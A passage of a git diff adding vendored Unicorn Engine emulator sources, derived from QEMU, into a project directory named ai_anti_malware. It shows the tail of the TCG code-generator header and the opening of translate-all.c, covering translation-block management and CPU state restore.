1, +} TCGCond; + +/* Invert the sense of the comparison. */ +static inline TCGCond tcg_invert_cond(TCGCond c) +{ + return (TCGCond)(c ^ 1); +} + +/* Swap the operands in a comparison. */ +static inline TCGCond tcg_swap_cond(TCGCond c) +{ + return c & 6 ? (TCGCond)(c ^ 9) : c; +} + +/* Create an "unsigned" version of a "signed" comparison. */ +static inline TCGCond tcg_unsigned_cond(TCGCond c) +{ + return c & 2 ? (TCGCond)(c ^ 6) : c; +} + +/* Must a comparison be considered unsigned? */ +static inline bool is_unsigned_cond(TCGCond c) +{ + return (c & 4) != 0; +} + +/* Create a "high" version of a double-word comparison. + This removes equality from a LTE or GTE comparison. */ +static inline TCGCond tcg_high_cond(TCGCond c) +{ + switch (c) { + case TCG_COND_GE: + case TCG_COND_LE: + case TCG_COND_GEU: + case TCG_COND_LEU: + return (TCGCond)(c ^ 8); + default: + return c; + } +} + +#define TEMP_VAL_DEAD 0 +#define TEMP_VAL_REG 1 +#define TEMP_VAL_MEM 2 +#define TEMP_VAL_CONST 3 + +/* XXX: optimize memory layout */ +typedef struct TCGTemp { + TCGType base_type; + TCGType type; + int val_type; + int reg; + tcg_target_long val; + int mem_reg; + intptr_t mem_offset; + unsigned int fixed_reg:1; + unsigned int mem_coherent:1; + unsigned int mem_allocated:1; + unsigned int temp_local:1; /* If true, the temp is saved across + basic blocks. Otherwise, it is not + preserved across basic blocks. */ + unsigned int temp_allocated:1; /* never used for code gen */ + const char *name; +} TCGTemp; + +typedef struct TCGContext TCGContext; + +typedef struct TCGTempSet { + unsigned long l[BITS_TO_LONGS(TCG_MAX_TEMPS)]; +} TCGTempSet; + + +/* pool based memory allocation */ + +void *tcg_malloc_internal(TCGContext *s, int size); +void tcg_pool_reset(TCGContext *s); +void tcg_pool_delete(TCGContext *s); + +void tcg_context_init(TCGContext *s); +void tcg_context_free(void *s); // free memory allocated for @s +void tcg_prologue_init(TCGContext *s); +void tcg_func_start(TCGContext *s); + +int tcg_gen_code(TCGContext *s, tcg_insn_unit *gen_code_buf); +int tcg_gen_code_search_pc(TCGContext *s, tcg_insn_unit *gen_code_buf, + long offset); + +void tcg_set_frame(TCGContext *s, int reg, intptr_t start, intptr_t size); + +TCGv_i32 tcg_global_reg_new_i32(TCGContext *s, int reg, const char *name); +TCGv_i32 tcg_global_mem_new_i32(TCGContext *s, int reg, intptr_t offset, const char *name); +TCGv_i32 tcg_temp_new_internal_i32(TCGContext *s, int temp_local); +static inline TCGv_i32 tcg_temp_new_i32(TCGContext *s) +{ + return tcg_temp_new_internal_i32(s, 0); +} +static inline TCGv_i32 tcg_temp_local_new_i32(TCGContext *s) +{ + return tcg_temp_new_internal_i32(s, 1); +} +void tcg_temp_free_i32(TCGContext *s, TCGv_i32 arg); +char *tcg_get_arg_str_i32(TCGContext *s, char *buf, int buf_size, TCGv_i32 arg); + +TCGv_i64 tcg_global_reg_new_i64(TCGContext *s, int reg, const char *name); +TCGv_i64 tcg_global_mem_new_i64(TCGContext *s, int reg, intptr_t offset, const char *name); +TCGv_i64 tcg_temp_new_internal_i64(TCGContext *s, int temp_local); +static inline TCGv_i64 tcg_temp_new_i64(TCGContext *s) +{ + return tcg_temp_new_internal_i64(s, 0); +} +static inline TCGv_i64 tcg_temp_local_new_i64(TCGContext *s) +{ + return tcg_temp_new_internal_i64(s, 1); +} +void tcg_temp_free_i64(TCGContext *s, TCGv_i64 arg); +char *tcg_get_arg_str_i64(TCGContext *s, char *buf, int buf_size, TCGv_i64 arg); + +#if defined(CONFIG_DEBUG_TCG) +/* If you call tcg_clear_temp_count() at the start of a section of + * code which is not supposed to leak any TCG temporaries, then + * calling tcg_check_temp_count() at the end of the section will + * return 1 if the section did in fact leak a temporary. + */ +void tcg_clear_temp_count(void); +int tcg_check_temp_count(void); +#else +#define tcg_clear_temp_count() do { } while (0) +#define tcg_check_temp_count() 0 +#endif + +void tcg_dump_info(FILE *f, fprintf_function cpu_fprintf); + +#define TCG_CT_ALIAS 0x80 +#define TCG_CT_IALIAS 0x40 +#define TCG_CT_REG 0x01 +#define TCG_CT_CONST 0x02 /* any constant of register size */ + +typedef struct TCGArgConstraint { + uint16_t ct; + uint8_t alias_index; + union { + TCGRegSet regs; + } u; +} TCGArgConstraint; + +#define TCG_MAX_OP_ARGS 16 + +/* Bits for TCGOpDef->flags, 8 bits available. */ +enum { + /* Instruction defines the end of a basic block. */ + TCG_OPF_BB_END = 0x01, + /* Instruction clobbers call registers and potentially update globals. */ + TCG_OPF_CALL_CLOBBER = 0x02, + /* Instruction has side effects: it cannot be removed if its outputs + are not used, and might trigger exceptions. */ + TCG_OPF_SIDE_EFFECTS = 0x04, + /* Instruction operands are 64-bits (otherwise 32-bits). */ + TCG_OPF_64BIT = 0x08, + /* Instruction is optional and not implemented by the host, or insn + is generic and should not be implemened by the host. */ + TCG_OPF_NOT_PRESENT = 0x10, +}; + +typedef struct TCGOpDef { + const char *name; + uint8_t nb_oargs, nb_iargs, nb_cargs, nb_args; + uint8_t flags; + TCGArgConstraint *args_ct; + int *sorted_args; +#if defined(CONFIG_DEBUG_TCG) + int used; +#endif +} TCGOpDef; + +typedef enum { + TCG_TEMP_UNDEF = 0, + TCG_TEMP_CONST, + TCG_TEMP_COPY, +} tcg_temp_state; + +struct tcg_temp_info { + tcg_temp_state state; + uint16_t prev_copy; + uint16_t next_copy; + tcg_target_ulong val; + tcg_target_ulong mask; +}; + +struct TCGContext { + uint8_t *pool_cur, *pool_end; + TCGPool *pool_first, *pool_current, *pool_first_large; + TCGLabel *labels; + int nb_labels; + int nb_globals; + int nb_temps; + + /* goto_tb support */ + tcg_insn_unit *code_buf; + uintptr_t *tb_next; + uint16_t *tb_next_offset; + uint16_t *tb_jmp_offset; /* != NULL if USE_DIRECT_JUMP */ + + /* liveness analysis */ + uint16_t *op_dead_args; /* for each operation, each bit tells if the + corresponding argument is dead */ + uint8_t *op_sync_args; /* for each operation, each bit tells if the + corresponding output argument needs to be + sync to memory. */ + + /* tells in which temporary a given register is. It does not take + into account fixed registers */ + int reg_to_temp[TCG_TARGET_NB_REGS]; + TCGRegSet reserved_regs; + intptr_t current_frame_offset; + intptr_t frame_start; + intptr_t frame_end; + int frame_reg; + + tcg_insn_unit *code_ptr; + TCGTemp temps[TCG_MAX_TEMPS]; /* globals first, temps after */ + TCGTempSet free_temps[TCG_TYPE_COUNT * 2]; + + GHashTable *helpers; + +#ifdef CONFIG_PROFILER + /* profiling info */ + int64_t tb_count1; + int64_t tb_count; + int64_t op_count; /* total insn count */ + int op_count_max; /* max insn per TB */ + int64_t temp_count; + int temp_count_max; + int64_t del_op_count; + int64_t code_in_len; + int64_t code_out_len; + int64_t interm_time; + int64_t code_time; + int64_t la_time; + int64_t opt_time; + int64_t restore_count; + int64_t restore_time; +#endif + +#ifdef CONFIG_DEBUG_TCG + int temps_in_use; + int goto_tb_issue_mask; +#endif + + uint16_t gen_opc_buf[OPC_BUF_SIZE]; + TCGArg gen_opparam_buf[OPPARAM_BUF_SIZE]; + + uint16_t *gen_opc_ptr; + TCGArg *gen_opparam_ptr; + target_ulong gen_opc_pc[OPC_BUF_SIZE]; + uint16_t gen_opc_icount[OPC_BUF_SIZE]; + uint8_t gen_opc_instr_start[OPC_BUF_SIZE]; + + /* Code generation. Note that we specifically do not use tcg_insn_unit + here, because there's too much arithmetic throughout that relies + on addition and subtraction working on bytes. Rely on the GCC + extension that allows arithmetic on void*. */ + int code_gen_max_blocks; + void *code_gen_prologue; + void *code_gen_buffer; + size_t code_gen_buffer_size; + /* threshold to flush the translated code buffer */ + size_t code_gen_buffer_max_size; + void *code_gen_ptr; + + TBContext tb_ctx; + + /* The TCGBackendData structure is private to tcg-target.c. */ + struct TCGBackendData *be; + + // Unicorn engine variables + struct uc_struct *uc; + /* qemu/target-i386/translate.c: global register indexes */ + TCGv_ptr cpu_env; + TCGv_i32 cpu_cc_op; + void *cpu_regs[16]; // 16 GRP for X86-64 + int x86_64_hregs; // qemu/target-i386/translate.c + uint8_t gen_opc_cc_op[OPC_BUF_SIZE]; // qemu/target-i386/translate.c + + /* qemu/target-i386/translate.c: global TCGv vars */ + void *cpu_A0; + void *cpu_cc_dst, *cpu_cc_src, *cpu_cc_src2, *cpu_cc_srcT; + + /* qemu/target-i386/translate.c: local temps */ + void *cpu_T[2]; + + /* qemu/target-i386/translate.c: local register indexes (only used inside old micro ops) */ + void *cpu_tmp0, *cpu_tmp4; + TCGv_ptr cpu_ptr0, cpu_ptr1; + TCGv_i32 cpu_tmp2_i32, cpu_tmp3_i32; + TCGv_i64 cpu_tmp1_i64; + + /* qemu/tcg/i386/tcg-target.c */ + void *tb_ret_addr; + int guest_base_flags; + /* If bit_MOVBE is defined in cpuid.h (added in GCC version 4.6), we are + going to attempt to determine at runtime whether movbe is available. */ + bool have_movbe; + + /* qemu/tcg/tcg.c */ + uint64_t tcg_target_call_clobber_regs; + uint64_t tcg_target_available_regs[2]; + TCGOpDef *tcg_op_defs; + + /* qemu/tcg/optimize.c */ + struct tcg_temp_info temps2[TCG_MAX_TEMPS]; + + /* qemu/target-m68k/translate.c */ + TCGv_i32 cpu_halted; + char cpu_reg_names[3*8*3 + 5*4]; + void *cpu_dregs[8]; + void *cpu_aregs[8]; + TCGv_i64 cpu_fregs[8]; + TCGv_i64 cpu_macc[4]; + TCGv_i64 QREG_FP_RESULT; + void *QREG_PC, *QREG_SR, *QREG_CC_OP, *QREG_CC_DEST, *QREG_CC_SRC; + void *QREG_CC_X, *QREG_DIV1, *QREG_DIV2, *QREG_MACSR, *QREG_MAC_MASK; + void *NULL_QREG; + void *opcode_table[65536]; + /* Used to distinguish stores from bad addressing modes. */ + void *store_dummy; + + /* qemu/target-arm/translate.c */ + uint32_t gen_opc_condexec_bits[OPC_BUF_SIZE]; + TCGv_i64 cpu_V0, cpu_V1, cpu_M0; + /* We reuse the same 64-bit temporaries for efficiency. */ + TCGv_i32 cpu_R[16]; + TCGv_i32 cpu_CF, cpu_NF, cpu_VF, cpu_ZF; + TCGv_i64 cpu_exclusive_addr; + TCGv_i64 cpu_exclusive_val; + TCGv_i32 cpu_F0s, cpu_F1s; + TCGv_i64 cpu_F0d, cpu_F1d; + + /* qemu/target-arm/translate-a64.c */ + TCGv_i64 cpu_pc; + /* Load/store exclusive handling */ + TCGv_i64 cpu_exclusive_high; + TCGv_i64 cpu_X[32]; + + /* qemu/target-mips/translate.c */ + /* global register indices */ + void *cpu_gpr[32], *cpu_PC; + void *cpu_HI[4], *cpu_LO[4]; // MIPS_DSP_ACC = 4 in qemu/target-mips/cpu.h + void *cpu_dspctrl, *btarget, *bcond; + TCGv_i32 hflags; + TCGv_i32 fpu_fcr31; + TCGv_i64 fpu_f64[32]; + TCGv_i64 msa_wr_d[64]; + + uint32_t gen_opc_hflags[OPC_BUF_SIZE]; + target_ulong gen_opc_btarget[OPC_BUF_SIZE]; + + /* qemu/target-sparc/translate.c */ + /* global register indexes */ + TCGv_ptr cpu_regwptr; + TCGv_i32 cpu_psr; + TCGv_i32 cpu_xcc, cpu_asi, cpu_fprs; + TCGv_i32 cpu_softint; + /* Floating point registers */ + TCGv_i64 cpu_fpr[32]; // TARGET_DPREGS = 32 for Sparc64, 16 for Sparc + + target_ulong gen_opc_npc[OPC_BUF_SIZE]; + target_ulong gen_opc_jump_pc[2]; + + // void *cpu_cc_src, *cpu_cc_src2, *cpu_cc_dst; + void *cpu_fsr, *sparc_cpu_pc, *cpu_npc, *cpu_gregs[8]; + void *cpu_y; + void *cpu_tbr; + void *cpu_cond; + void *cpu_gsr; + void *cpu_tick_cmpr, *cpu_stick_cmpr, *cpu_hstick_cmpr; + void *cpu_hintp, *cpu_htba, *cpu_hver, *cpu_ssr, *cpu_ver; + void *cpu_wim; + + int exitreq_label; // gen_tb_start() +}; + +typedef struct TCGTargetOpDef { + TCGOpcode op; + const char *args_ct_str[TCG_MAX_OP_ARGS]; +} TCGTargetOpDef; + +#define tcg_abort() \ +do {\ + fprintf(stderr, "%s:%d: tcg fatal error\n", __FILE__, __LINE__);\ + abort();\ +} while (0) + +#ifdef CONFIG_DEBUG_TCG +# define tcg_debug_assert(X) do { assert(X); } while (0) +#elif QEMU_GNUC_PREREQ(4, 5) +# define tcg_debug_assert(X) \ + do { if (!(X)) { __builtin_unreachable(); } } while (0) +#else +# define tcg_debug_assert(X) do { (void)(X); } while (0) +#endif + +void tcg_add_target_add_op_defs(TCGContext *s, const TCGTargetOpDef *tdefs); + +#if UINTPTR_MAX == UINT32_MAX +#define TCGV_NAT_TO_PTR(n) MAKE_TCGV_PTR(GET_TCGV_I32(n)) +#define TCGV_PTR_TO_NAT(n) MAKE_TCGV_I32(GET_TCGV_PTR(n)) + +#define tcg_const_ptr(t, V) TCGV_NAT_TO_PTR(tcg_const_i32(t, (intptr_t)(V))) +#define tcg_global_reg_new_ptr(U, R, N) \ + TCGV_NAT_TO_PTR(tcg_global_reg_new_i32(U, (R), (N))) +#define tcg_global_mem_new_ptr(t, R, O, N) \ + TCGV_NAT_TO_PTR(tcg_global_mem_new_i32(t, (R), (O), (N))) +#define tcg_temp_new_ptr(s) TCGV_NAT_TO_PTR(tcg_temp_new_i32(s)) +#define tcg_temp_free_ptr(s, T) tcg_temp_free_i32(s, TCGV_PTR_TO_NAT(T)) +#else +#define TCGV_NAT_TO_PTR(n) MAKE_TCGV_PTR(GET_TCGV_I64(n)) +#define TCGV_PTR_TO_NAT(n) MAKE_TCGV_I64(GET_TCGV_PTR(n)) + +#define tcg_const_ptr(t, V) TCGV_NAT_TO_PTR(tcg_const_i64(t, (intptr_t)(V))) +#define tcg_global_reg_new_ptr(U, R, N) \ + TCGV_NAT_TO_PTR(tcg_global_reg_new_i64(U, (R), (N))) +#define tcg_global_mem_new_ptr(t, R, O, N) \ + TCGV_NAT_TO_PTR(tcg_global_mem_new_i64(t, (R), (O), (N))) +#define tcg_temp_new_ptr(s) TCGV_NAT_TO_PTR(tcg_temp_new_i64(s)) +#define tcg_temp_free_ptr(s, T) tcg_temp_free_i64(s, TCGV_PTR_TO_NAT(T)) +#endif + +void tcg_gen_callN(TCGContext *s, void *func, + TCGArg ret, int nargs, TCGArg *args); + +void tcg_gen_shifti_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, + int c, int right, int arith); + +TCGArg *tcg_optimize(TCGContext *s, uint16_t *tcg_opc_ptr, TCGArg *args, + TCGOpDef *tcg_op_def); + +static inline void *tcg_malloc(TCGContext *s, int size) +{ + uint8_t *ptr, *ptr_end; + size = (size + sizeof(long) - 1) & ~(sizeof(long) - 1); + ptr = s->pool_cur; + ptr_end = ptr + size; + if (unlikely(ptr_end > s->pool_end)) { + return tcg_malloc_internal(s, size); + } else { + s->pool_cur = ptr_end; + return ptr; + } +} + +/* only used for debugging purposes */ +void tcg_dump_ops(TCGContext *s); + +void dump_ops(const uint16_t *opc_buf, const TCGArg *opparam_buf); +TCGv_i32 tcg_const_i32(TCGContext *s, int32_t val); +TCGv_i64 tcg_const_i64(TCGContext *s, int64_t val); +TCGv_i32 tcg_const_local_i32(TCGContext *s, int32_t val); +TCGv_i64 tcg_const_local_i64(TCGContext *s, int64_t val); + +/** + * tcg_ptr_byte_diff + * @a, @b: addresses to be differenced + * + * There are many places within the TCG backends where we need a byte + * difference between two pointers. While this can be accomplished + * with local casting, it's easy to get wrong -- especially if one is + * concerned with the signedness of the result. + * + * This version relies on GCC's void pointer arithmetic to get the + * correct result. + */ + +static inline ptrdiff_t tcg_ptr_byte_diff(void *a, void *b) +{ + return (char*)a - (char*)b; +} + +/** + * tcg_pcrel_diff + * @s: the tcg context + * @target: address of the target + * + * Produce a pc-relative difference, from the current code_ptr + * to the destination address. + */ + +static inline ptrdiff_t tcg_pcrel_diff(TCGContext *s, void *target) +{ + return tcg_ptr_byte_diff(target, s->code_ptr); +} + +/** + * tcg_current_code_size + * @s: the tcg context + * + * Compute the current code size within the translation block. + * This is used to fill in qemu's data structures for goto_tb. + */ + +static inline size_t tcg_current_code_size(TCGContext *s) +{ + return tcg_ptr_byte_diff(s->code_ptr, s->code_buf); +} + +/** + * tcg_qemu_tb_exec: + * @env: CPUArchState * for the CPU + * @tb_ptr: address of generated code for the TB to execute + * + * Start executing code from a given translation block. + * Where translation blocks have been linked, execution + * may proceed from the given TB into successive ones. + * Control eventually returns only when some action is needed + * from the top-level loop: either control must pass to a TB + * which has not yet been directly linked, or an asynchronous + * event such as an interrupt needs handling. + * + * The return value is a pointer to the next TB to execute + * (if known; otherwise zero). This pointer is assumed to be + * 4-aligned, and the bottom two bits are used to return further + * information: + * 0, 1: the link between this TB and the next is via the specified + * TB index (0 or 1). That is, we left the TB via (the equivalent + * of) "goto_tb ". The main loop uses this to determine + * how to link the TB just executed to the next. + * 2: we are using instruction counting code generation, and we + * did not start executing this TB because the instruction counter + * would hit zero midway through it. In this case the next-TB pointer + * returned is the TB we were about to execute, and the caller must + * arrange to execute the remaining count of instructions. + * 3: we stopped because the CPU's exit_request flag was set + * (usually meaning that there is an interrupt that needs to be + * handled). The next-TB pointer returned is the TB we were + * about to execute when we noticed the pending exit request. + * + * If the bottom two bits indicate an exit-via-index then the CPU + * state is correctly synchronised and ready for execution of the next + * TB (and in particular the guest PC is the address to execute next). + * Otherwise, we gave up on execution of this TB before it started, and + * the caller must fix up the CPU state by calling cpu_pc_from_tb() + * with the next-TB pointer we return. + * + * Note that TCG targets may use a different definition of tcg_qemu_tb_exec + * to this default (which just calls the prologue.code emitted by + * tcg_target_qemu_prologue()). + */ +#define TB_EXIT_MASK 3 +#define TB_EXIT_IDX0 0 +#define TB_EXIT_IDX1 1 +#define TB_EXIT_ICOUNT_EXPIRED 2 +#define TB_EXIT_REQUESTED 3 + +#if !defined(tcg_qemu_tb_exec) +# define tcg_qemu_tb_exec(env, tb_ptr) \ + ((uintptr_t (*)(void *, void *))tcg_ctx->code_gen_prologue)(env, tb_ptr) +#endif + +/* + * Memory helpers that will be used by TCG generated code. + */ +#ifdef CONFIG_SOFTMMU +/* Value zero-extended to tcg register size. */ +tcg_target_ulong helper_ret_ldub_mmu(CPUArchState *env, target_ulong addr, + int mmu_idx, uintptr_t retaddr); +tcg_target_ulong helper_le_lduw_mmu(CPUArchState *env, target_ulong addr, + int mmu_idx, uintptr_t retaddr); +tcg_target_ulong helper_le_ldul_mmu(CPUArchState *env, target_ulong addr, + int mmu_idx, uintptr_t retaddr); +uint64_t helper_le_ldq_mmu(CPUArchState *env, target_ulong addr, + int mmu_idx, uintptr_t retaddr); +tcg_target_ulong helper_be_lduw_mmu(CPUArchState *env, target_ulong addr, + int mmu_idx, uintptr_t retaddr); +tcg_target_ulong helper_be_ldul_mmu(CPUArchState *env, target_ulong addr, + int mmu_idx, uintptr_t retaddr); +uint64_t helper_be_ldq_mmu(CPUArchState *env, target_ulong addr, + int mmu_idx, uintptr_t retaddr); + +/* Value sign-extended to tcg register size. */ +tcg_target_ulong helper_ret_ldsb_mmu(CPUArchState *env, target_ulong addr, + int mmu_idx, uintptr_t retaddr); +tcg_target_ulong helper_le_ldsw_mmu(CPUArchState *env, target_ulong addr, + int mmu_idx, uintptr_t retaddr); +tcg_target_ulong helper_le_ldsl_mmu(CPUArchState *env, target_ulong addr, + int mmu_idx, uintptr_t retaddr); +tcg_target_ulong helper_be_ldsw_mmu(CPUArchState *env, target_ulong addr, + int mmu_idx, uintptr_t retaddr); +tcg_target_ulong helper_be_ldsl_mmu(CPUArchState *env, target_ulong addr, + int mmu_idx, uintptr_t retaddr); + +void helper_ret_stb_mmu(CPUArchState *env, target_ulong addr, uint8_t val, + int mmu_idx, uintptr_t retaddr); +void helper_le_stw_mmu(CPUArchState *env, target_ulong addr, uint16_t val, + int mmu_idx, uintptr_t retaddr); +void helper_le_stl_mmu(CPUArchState *env, target_ulong addr, uint32_t val, + int mmu_idx, uintptr_t retaddr); +void helper_le_stq_mmu(CPUArchState *env, target_ulong addr, uint64_t val, + int mmu_idx, uintptr_t retaddr); +void helper_be_stw_mmu(CPUArchState *env, target_ulong addr, uint16_t val, + int mmu_idx, uintptr_t retaddr); +void helper_be_stl_mmu(CPUArchState *env, target_ulong addr, uint32_t val, + int mmu_idx, uintptr_t retaddr); +void helper_be_stq_mmu(CPUArchState *env, target_ulong addr, uint64_t val, + int mmu_idx, uintptr_t retaddr); + +/* Temporary aliases until backends are converted. */ +#ifdef TARGET_WORDS_BIGENDIAN +# define helper_ret_ldsw_mmu helper_be_ldsw_mmu +# define helper_ret_lduw_mmu helper_be_lduw_mmu +# define helper_ret_ldsl_mmu helper_be_ldsl_mmu +# define helper_ret_ldul_mmu helper_be_ldul_mmu +# define helper_ret_ldq_mmu helper_be_ldq_mmu +# define helper_ret_stw_mmu helper_be_stw_mmu +# define helper_ret_stl_mmu helper_be_stl_mmu +# define helper_ret_stq_mmu helper_be_stq_mmu +#else +# define helper_ret_ldsw_mmu helper_le_ldsw_mmu +# define helper_ret_lduw_mmu helper_le_lduw_mmu +# define helper_ret_ldsl_mmu helper_le_ldsl_mmu +# define helper_ret_ldul_mmu helper_le_ldul_mmu +# define helper_ret_ldq_mmu helper_le_ldq_mmu +# define helper_ret_stw_mmu helper_le_stw_mmu +# define helper_ret_stl_mmu helper_le_stl_mmu +# define helper_ret_stq_mmu helper_le_stq_mmu +#endif + +void check_exit_request(TCGContext *tcg_ctx); + +#endif /* CONFIG_SOFTMMU */ + +#endif /* TCG_H */ diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/translate-all.c b/ai_anti_malware/unicorn/unicorn-master/qemu/translate-all.c new file mode 100644 index 0000000..2deddd1 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/translate-all.c @@ -0,0 +1,2013 @@ +/* + * Host code generation + * + * Copyright (c) 2003 Fabrice Bellard + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . + */ +/* Modified for Unicorn Engine by Nguyen Anh Quynh, 2015 */ + +#ifdef _WIN32 +#include +#include +#else +#include +#include +#endif +#include +#include +#include +#include +#include "unicorn/platform.h" + +#include "config.h" + +#include "qemu-common.h" +#define NO_CPU_IO_DEFS +#include "cpu.h" +#include "tcg.h" +#if defined(CONFIG_USER_ONLY) +#include "qemu.h" +#if defined(__FreeBSD__) || defined(__FreeBSD_kernel__) +#include +#if __FreeBSD_version >= 700104 +#define HAVE_KINFO_GETVMMAP +#define sigqueue sigqueue_freebsd /* avoid redefinition */ +#include +#include +#define _KERNEL +#include +#undef _KERNEL +#undef sigqueue +#include +#endif +#endif +#else +#include "exec/address-spaces.h" +#endif + +#include "exec/cputlb.h" +#include "translate-all.h" +#include "qemu/timer.h" + +#include "uc_priv.h" + +//#define DEBUG_TB_INVALIDATE +//#define DEBUG_FLUSH +/* make various TB consistency checks */ +//#define DEBUG_TB_CHECK + +#if !defined(CONFIG_USER_ONLY) +/* TB consistency checks only implemented for usermode emulation. */ +#undef DEBUG_TB_CHECK +#endif + +#define SMC_BITMAP_USE_THRESHOLD 10 + +typedef struct PageDesc { + /* list of TBs intersecting this ram page */ + TranslationBlock *first_tb; + /* in order to optimize self modifying code, we count the number + of lookups we do to a given page to use a bitmap */ + unsigned int code_write_count; + uint8_t *code_bitmap; +#if defined(CONFIG_USER_ONLY) + unsigned long flags; +#endif +} PageDesc; + +/* In system mode we want L1_MAP to be based on ram offsets, + while in user mode we want it to be based on virtual addresses. */ +#if !defined(CONFIG_USER_ONLY) +#if HOST_LONG_BITS < TARGET_PHYS_ADDR_SPACE_BITS +# define L1_MAP_ADDR_SPACE_BITS HOST_LONG_BITS +#else +# define L1_MAP_ADDR_SPACE_BITS TARGET_PHYS_ADDR_SPACE_BITS +#endif +#else +# define L1_MAP_ADDR_SPACE_BITS TARGET_VIRT_ADDR_SPACE_BITS +#endif + +/* Size of the L2 (and L3, etc) page tables. */ +#define V_L2_BITS 10 +#define V_L2_SIZE (1 << V_L2_BITS) + +/* The bits remaining after N lower levels of page tables. */ +#define V_L1_BITS_REM \ + ((L1_MAP_ADDR_SPACE_BITS - TARGET_PAGE_BITS) % V_L2_BITS) + +#if V_L1_BITS_REM < 4 +#define V_L1_BITS (V_L1_BITS_REM + V_L2_BITS) +#else +#define V_L1_BITS V_L1_BITS_REM +#endif + +#define V_L1_SIZE ((target_ulong)1 << V_L1_BITS) + +#define V_L1_SHIFT (L1_MAP_ADDR_SPACE_BITS - TARGET_PAGE_BITS - V_L1_BITS) + +static uintptr_t qemu_real_host_page_size; +static uintptr_t qemu_host_page_size; +static uintptr_t qemu_host_page_mask; + + +static void tb_link_page(struct uc_struct *uc, TranslationBlock *tb, + tb_page_addr_t phys_pc, tb_page_addr_t phys_page2); +static TranslationBlock *tb_find_pc(struct uc_struct *uc, uintptr_t tc_ptr); + +// Unicorn: for cleaning up memory later. +void free_code_gen_buffer(struct uc_struct *uc); + +static void cpu_gen_init(struct uc_struct *uc) +{ + uc->tcg_ctx = g_malloc(sizeof(TCGContext)); + tcg_context_init(uc->tcg_ctx); +} + +static void tb_clean_internal(void **p, int x) +{ + int i; + void **q; + + if (x <= 1) { + for (i = 0; i < V_L2_SIZE; i++) { + q = p[i]; + if (q) { + g_free(q); + } + } + g_free(p); + } else { + for (i = 0; i < V_L2_SIZE; i++) { + q = p[i]; + if (q) { + tb_clean_internal(q, x - 1); + } + } + g_free(p); + } +} + +void tb_cleanup(struct uc_struct *uc) +{ + int i, x; + void **p; + + if (uc) { + if (uc->l1_map) { + x = V_L1_SHIFT / V_L2_BITS; + if (x <= 1) { + for (i = 0; i < V_L1_SIZE; i++) { + p = uc->l1_map[i]; + if (p) { + g_free(p); + uc->l1_map[i] = NULL; + } + } + } else { + for (i = 0; i < V_L1_SIZE; i++) { + p = uc->l1_map[i]; + if (p) { + tb_clean_internal(p, x - 1); + uc->l1_map[i] = NULL; + } + } + } + } + } +} + +/* return non zero if the very first instruction is invalid so that + the virtual CPU can trigger an exception. + + '*gen_code_size_ptr' contains the size of the generated code (host + code). +*/ +static int cpu_gen_code(CPUArchState *env, TranslationBlock *tb, int *gen_code_size_ptr) // qq +{ + TCGContext *s = env->uc->tcg_ctx; + tcg_insn_unit *gen_code_buf; + int gen_code_size; +#ifdef CONFIG_PROFILER + int64_t ti; +#endif + +#ifdef CONFIG_PROFILER + s->tb_count1++; /* includes aborted translations because of + exceptions */ + ti = profile_getclock(); +#endif + tcg_func_start(s); + + gen_intermediate_code(env, tb); + + // Unicorn: when tracing block, patch block size operand for callback + if (env->uc->size_arg != -1 && HOOK_EXISTS_BOUNDED(env->uc, UC_HOOK_BLOCK, tb->pc)) { + if (env->uc->block_full) // block size is unknown + *(s->gen_opparam_buf + env->uc->size_arg) = 0; + else + *(s->gen_opparam_buf + env->uc->size_arg) = tb->size; + } + + /* generate machine code */ + gen_code_buf = tb->tc_ptr; + tb->tb_next_offset[0] = 0xffff; + tb->tb_next_offset[1] = 0xffff; + s->tb_next_offset = tb->tb_next_offset; +#ifdef USE_DIRECT_JUMP + s->tb_jmp_offset = tb->tb_jmp_offset; + s->tb_next = NULL; +#else + s->tb_jmp_offset = NULL; + s->tb_next = tb->tb_next; +#endif + +#ifdef CONFIG_PROFILER + s->tb_count++; + s->interm_time += profile_getclock() - ti; + s->code_time -= profile_getclock(); +#endif + gen_code_size = tcg_gen_code(s, gen_code_buf); + if (gen_code_size == -1) { + return -1; + } + //printf(">>> code size = %u: ", gen_code_size); + //int i; + //for (i = 0; i < gen_code_size; i++) { + // printf(" %02x", gen_code_buf[i]); + //} + //printf("\n"); + *gen_code_size_ptr = gen_code_size; +#ifdef CONFIG_PROFILER + s->code_time += profile_getclock(); + s->code_in_len += tb->size; + s->code_out_len += gen_code_size; +#endif + + return 0; +} + +/* The cpu state corresponding to 'searched_pc' is restored. + */ +static int cpu_restore_state_from_tb(CPUState *cpu, TranslationBlock *tb, + uintptr_t searched_pc) +{ + CPUArchState *env = cpu->env_ptr; + TCGContext *s = cpu->uc->tcg_ctx; + int j; + uintptr_t tc_ptr; +#ifdef CONFIG_PROFILER + int64_t ti; +#endif + +#ifdef CONFIG_PROFILER + ti = profile_getclock(); +#endif + tcg_func_start(s); + + gen_intermediate_code_pc(env, tb); + + /* find opc index corresponding to search_pc */ + tc_ptr = (uintptr_t)tb->tc_ptr; + if (searched_pc < tc_ptr) + return -1; + + s->tb_next_offset = tb->tb_next_offset; +#ifdef USE_DIRECT_JUMP + s->tb_jmp_offset = tb->tb_jmp_offset; + s->tb_next = NULL; +#else + s->tb_jmp_offset = NULL; + s->tb_next = tb->tb_next; +#endif + j = tcg_gen_code_search_pc(s, (tcg_insn_unit *)tc_ptr, + searched_pc - tc_ptr); + if (j < 0) + return -1; + /* now find start of instruction before */ + while (s->gen_opc_instr_start[j] == 0) { + j--; + } + cpu->icount_decr.u16.low -= s->gen_opc_icount[j]; + + restore_state_to_opc(env, tb, j); + +#ifdef CONFIG_PROFILER + s->restore_time += profile_getclock() - ti; + s->restore_count++; +#endif + return 0; +} + +bool cpu_restore_state(CPUState *cpu, uintptr_t retaddr) +{ + TranslationBlock *tb; + CPUArchState *env = cpu->env_ptr; + + tb = tb_find_pc(env->uc, retaddr); + if (tb) { + cpu_restore_state_from_tb(cpu, tb, retaddr); + return true; + } + return false; +} + +#ifdef _WIN32 +static inline QEMU_UNUSED_FUNC void map_exec(void *addr, long size) +{ + DWORD 